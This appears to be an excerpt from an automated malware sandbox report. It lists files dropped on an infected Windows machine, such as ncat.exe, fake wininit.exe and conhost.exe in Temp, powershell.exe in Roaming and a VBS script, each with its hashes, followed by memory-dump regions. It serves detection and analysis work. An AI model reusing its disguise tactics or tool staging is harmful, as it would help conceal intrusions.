SHA16bf06056d1bb14c183490caf950e29ac9d73643a
SHA25682147660dc8d3259f87906470e055ae572c1681201f74989b08789298511e5f0
SHA512425a4a8babbc11664d9bac3232b42c45ce8430b3f0b2ae3d9c8e12ad665cd4b4cbae98280084ee77cf463b852309d02ca43e5742a46c842c6b00431fc047d512
-
C:\Users\Admin\AppData\Local\Temp\$TMP~.batFilesize
135B
MD56bf11eb7e2ca37624f85d163b2a3f866
SHA100a65cddc32344d3b15b6bca4315ff692524494b
SHA256c4c7558e442c5f915fd6caf1290610ca2423dafca97ae05b1eac715f4267197b
SHA51279c8ba8ad545244c9c3765f32f291ffe918d8af1bcf7b3d375fdfee70e39ae4a548e25425ac3f2252276777a784a2ba5fd64f833b7776a413d4cabc3932272e0
-
C:\Users\Admin\AppData\Local\Temp\7zip.exeFilesize
65KB
MD5aa4404671315c6f141a264b628d05052
SHA15e1b52fd1b3ce93f82c35b8e07c08774003dd422
SHA256d09701eb2589607f7827408b297ce94f8f3f9afcbc77a8f098cac2df6ccb8d18
SHA5125a8e8398e126d760f5486de6fae139f3e597f26da2eccc89234c32131c352259a4b8cd19596ab58dd45ca66356f89290cbdb74d7e8b7daee1af73204fda08eca
-
C:\Users\Admin\AppData\Local\Temp\WinRunner.exeFilesize
10.2MB
MD54758850f5686ee8da4e930c97d6caca2
SHA1190f3d1b98411cc586546780a59d7c5730ab3d64
SHA256cdd06b27fd62b93abf2eadf7ad388fca617951a834c612862a5ee3c0c2cd72a3
SHA512c764ebd03544b5073577e2d5f84d8134d119b78a41179f24092cd9051f6396fcff639131c3e27617e0f40030f1af0d9e02a3f7d62e2987edbc4c9e26bbd3a1af
-
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_aba34oxz.1ra.ps1Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
C:\Users\Admin\AppData\Local\Temp\conhost.exeFilesize
63KB
MD5c8be6e344fd58475e1cfe3bf12e69380
SHA1da41de66884faeccc83283accc0d23a722915774
SHA256ccd4b5bf3a42a5006ced7f25a17765b778c17c6bb28a488dd466d493709cdec0
SHA51246639ab300a492f1d7783a27a349674a22b112b26a77e5ee7c3f910b88f2fa4f8e581b72e3e4632b4bdf7a04d63d1e3153a8989b2974bc4bdca985576c71cea8
-
C:\Users\Admin\AppData\Local\Temp\libcrypto-3.dllFilesize
3.9MB
MD527c8a62563e3f34f3466d3cbf4b8fe74
SHA123a2585b4afa8e77d365fb1bcf8c96d7273b9742
SHA2563927d87e03ad83e22a40fdcb680707a28eb04314af51f228130d8396dabb3de4
SHA512c24f2725a05b209895e4de7b548fc7782d5695bcadc6b79a742c9860efa4691f4cb0b997bb1035b379c64de9d5476e6425e1e76e0b6d73faee635e7fc87207d1
-
C:\Users\Admin\AppData\Local\Temp\libssl-3.dllFilesize
661KB
MD524f02f8bd55813c87a4952e60e87edf1
SHA1c19834e2d64dd44d84d58c73d88b454fd6ccb385
SHA25670b3b431d10ca9dea42b5b5aca85a97c39c91e0e2e3b5763514c1608a5f980b3
SHA51204922a3a80d551cfada9fcb765966eeca0741bfff3469a551d538580b64a70d8f1a6a94abada3762a79cd6fd2222eb38c9e491a74fc19937bbd8ab309770f7ad
-
C:\Users\Admin\AppData\Local\Temp\libuac.dll.batFilesize
5.9MB
MD501132c50b0d844fab3b44bdb50be7445
SHA1c1212c8576c7794a2bbcf86f6a5bbd212fa23994
SHA256874cd778f30a84b531ed0811536dd64fdf3259db9509116f3eb3414127a4e0bf
SHA51296be33e08ca7a4b7331f96488182d999d94a57923d70d6af0acda64795e3c4fc5cab55b16661af48832b63ea38bf39a40dfe636f479709e0d4afb723ac3d9c31
-
C:\Users\Admin\AppData\Local\Temp\ncat.exeFilesize
355KB
MD54f6b1c5a41f7e9d183a7dd3ace65812e
SHA1c08a5e5c59f39522939284ee8743ff55967da76a
SHA256a3071223a56a18c9fb913696487f69d1ea2633176412446d4b7eecc82d33c262
SHA51225c7a3f16b001144cc8fdc5c9014cdfe33352bd76c116c3e1b7e3238668ae0b284fc641b96aee92d07dc9a25fa9b016e441db96c07f2426e09b0ec9b8d2443cf
-
C:\Users\Admin\AppData\Local\Temp\wininit.exeFilesize
409KB
MD5ba300d38cfdf1c73eddcd7a1ac589b78
SHA1c8741781f775f51dbf559ae783adcd762b036946
SHA256e35f07e7fab453e5366f8f220d8302f31dc134aebc71fedc6beb113c9706961f
SHA51219274f0742d4e82c3f184ec264bb8f9d4fd3c7092b51ec63b727c3ab33ef70cd36805f1f7c52c663ff72496c79b827c23bfc547031f60e62dba396bdaaa50047
-
C:\Users\Admin\AppData\Roaming\Windows_Log_249.vbsFilesize
115B
MD56f8d66bf74c28786cb983fe4bb15a09d
SHA1b814ac7d5474eaa37a1e960bd58c439b74680225
SHA2565b3d9383ab911ca76a6bffa6a6cba314171b02bfa0b87a415fec7fec970b4ed6
SHA512bbd6765cf4750ee9eb5ee35c2cb4e6892aff0f7c5542ca33d839f488f22139c8bb431ce4c28ad323312977d64559a1c02a27f0b1e33f1cb0a1f9d7e50ff574e2
-
C:\Users\Admin\AppData\Roaming\powershell.exeFilesize
442KB
MD504029e121a0cfa5991749937dd22a1d9
SHA1f43d9bb316e30ae1a3494ac5b0624f6bea1bf054
SHA2569f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f
SHA5126a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b
-
memory/396-151-0x00000000061D0000-0x0000000006214000-memory.dmpFilesize
272KB
-
memory/396-149-0x0000000005C80000-0x0000000005C9E000-memory.dmpFilesize
120KB
-
memory/396-138-0x0000000005700000-0x0000000005766000-memory.dmpFilesize
408KB
-
memory/396-136-0x0000000004DC0000-0x0000000004DE2000-memory.dmpFilesize
136KB
-
memory/396-135-0x0000000004E30000-0x0000000005458000-memory.dmpFilesize
6.2MB
-
memory/396-176-0x0000000007690000-0x0000000007D0A000-memory.dmpFilesize
6.5MB
-
memory/396-134-0x00000000047A0000-0x00000000047D6000-memory.dmpFilesize
216KB
-
memory/396-177-0x0000000007030000-0x000000000704A000-memory.dmpFilesize
104KB
-
memory/396-150-0x0000000005CD0000-0x0000000005D1C000-memory.dmpFilesize
304KB
-
memory/396-137-0x0000000005690000-0x00000000056F6000-memory.dmpFilesize
408KB
-
memory/396-148-0x0000000005770000-0x0000000005AC4000-memory.dmpFilesize
3.3MB
-
memory/396-154-0x0000000006F90000-0x0000000007006000-memory.dmpFilesize
472KB
-
memory/816-500-0x000001CA1F250000-0x000001CA1F26C000-memory.dmpFilesize
112KB
-
memory/816-501-0x000001CA1F240000-0x000001CA1F24A000-memory.dmpFilesize
40KB
-
memory/816-502-0x000001CA1F3B0000-0x000001CA1F3B8000-memory.dmpFilesize
32KB
-
memory/816-503-0x000001CA1F3C0000-0x000001CA1F3CA000-memory.dmpFilesize
40KB
-
memory/856-289-0x0000000006230000-0x0000000006584000-memory.dmpFilesize
3.3MB
-
memory/960-438-0x00007FFBD5A90000-0x00007FFBD5AA0000-memory.dmpFilesize
64KB
-
memory/1036-448-0x00007FFBD5A90000-0x00007FFBD5AA0000-memory.dmpFilesize
64KB
-
memory/1124-437-0x00007FFBD5A90000-0x00007FFBD5AA0000-memory.dmpFilesize
64KB
-
memory/1248-249-0x0000000005EF0000-0x0000000006244000-memory.dmpFilesize
3.3MB
-
memory/1352-443-0x00007FFBD5A90000-0x00007FFBD5AA0000-memory.dmpFilesize
64KB
-
memory/1520-445-0x00007FFBD5A90000-0x00007FFBD5AA0000-memory.dmpFilesize
64KB
-
memory/1588-110-0x0000000000180000-0x0000000000196000-memory.dmpFilesize
88KB
-
memory/1740-441-0x00007FFBD5A90000-0x00007FFBD5AA0000-memory.dmpFilesize
64KB
-
memory/1912-444-0x00007FFBD5A90000-0x00007FFBD5AA0000-memory.dmpFilesize
64KB
-
memory/2080-447-0x00007FFBD5A90000-0x00007FFBD5AA0000-memory.dmpFilesize
64KB
-
memory/2116-436-0x00007FFBD5A90000-0x00007FFBD5AA0000-memory.dmpFilesize
64KB
-
memory/2156-442-0x00007FFBD5A90000-0x00007FFBD5AA0000-memory.dmpFilesize
64KB
-
memory/2196-449-0x00007FFBD5A90000-0x00007FFBD5AA0000-memory.dmpFilesize
64KB
-
memory/2216-440-0x00007FFBD5A90000-0x00007FFBD5AA0000-memory.dmpFilesize
64KB
-
memory/2500-439-0x00007FFBD5A90000-0x00007FFBD5AA0000-memory.dmpFilesize
64KB
-
memory/2516-117-0x000001A1DBF20000-0x000001A1DC94C000-memory.dmpFilesize
10.2MB
-
memory/2556-11-0x00007FFBF7790000-0x00007FFBF8251000-memory.dmpFilesize
10.8MB
-
memory/2556-12-0x00007FFBF7790000-0x00007FFBF8251000-memory.dmpFilesize
10.8MB
-
memory/2556-16-0x00007FFBF7790000-0x00007FFBF8251000-memory.dmpFilesize
10.8MB
-
memory/2556-0-0x00007FFBF7793000-0x00007FFBF7795000-memory.dmpFilesize
8KB
-
memory/2556-10-0x000001E57EA70000-0x000001E57EA92000-memory.dmpFilesize
136KB
-
memory/2652-234-0x000000001C980000-0x000000001C98E000-memory.dmpFilesize
56KB
-
memory/2652-111-0x0000000000E90000-0x0000000000EA6000-memory.dmpFilesize
88KB
-
memory/2724-435-0x00007FFBD5A90000-0x00007FFBD5AA0000-memory.dmpFilesize
64KB
-
memory/2796-72-0x000002B3CDD80000-0x000002B3CDD9A000-memory.dmpFilesize
104KB
-
memory/2796-371-0x000002B3AB1B0000-0x000002B3AB1BC000-memory.dmpFilesize
48KB
-
memory/3224-121-0x00000000058B0000-0x0000000005942000-memory.dmpFilesize
584KB
-
memory/3224-153-0x0000000006AC0000-0x0000000006AFC000-memory.dmpFilesize
240KB
-
memory/3224-112-0x0000000000F40000-0x0000000000FAC000-memory.dmpFilesize
432KB
-
memory/3224-152-0x0000000006580000-0x0000000006592000-memory.dmpFilesize
72KB
-
memory/3224-179-0x00000000070A0000-0x00000000070AA000-memory.dmpFilesize
40KB
-
memory/3224-113-0x0000000005E60000-0x0000000006404000-memory.dmpFilesize
5.6MB
-
memory/3468-386-0x0000000003340000-0x000000000336A000-memory.dmpFilesize
168KB
-
memory/3468-434-0x00007FFBD5A90000-0x00007FFBD5AA0000-memory.dmpFilesize
64KB
-
memory/4424-219-0x0000000006AD0000-0x0000000006B1C000-memory.dmpFilesize
304KB
-
memory/4424-214-0x0000000006070000-0x00000000063C4000-memory.dmpFilesize
3.3MB
-
memory/4476-383-0x000001EBA93B0000-0x000001EBA93B8000-memory.dmpFilesize
32KB
-
memory/4476-384-0x000001EBA97B0000-0x000001EBA97FC000-memory.dmpFilesize
304KB
-
memory/4476-385-0x000001EBA93C0000-0x000001EBA93D6000-memory.dmpFilesize
88KB
-
memory/4860-446-0x00007FFBD5A90000-0x00007FFBD5AA0000-memory.dmpFilesize
64KB
-
memory/5020-24-0x00007FFBF7790000-0x00007FFBF8251000-memory.dmpFilesize
10.8MB
-
memory/5020-32-0x0000014967A10000-0x0000014967A86000-memory.dmpFilesize
472KB
-
memory/5020-29-0x00007FFBF7790000-0x00007FFBF8251000-memory.dmpFilesize
10.8MB
-
memory/5020-31-0x0000014967940000-0x0000014967984000-memory.dmpFilesize
272KB
-
memory/5020-30-0x00007FFBF7790000-0x00007FFBF8251000-memory.dmpFilesize
10.8MB
-
memory/5020-33-0x000001494CF60000-0x000001494CF68000-memory.dmpFilesize
32KB
-
memory/5020-34-0x0000014977DB0000-0x0000014978884000-memory.dmpFilesize
10.8MB
-
memory/5020-63-0x00007FFBF7790000-0x00007FFBF8251000-memory.dmpFilesize
10.8MB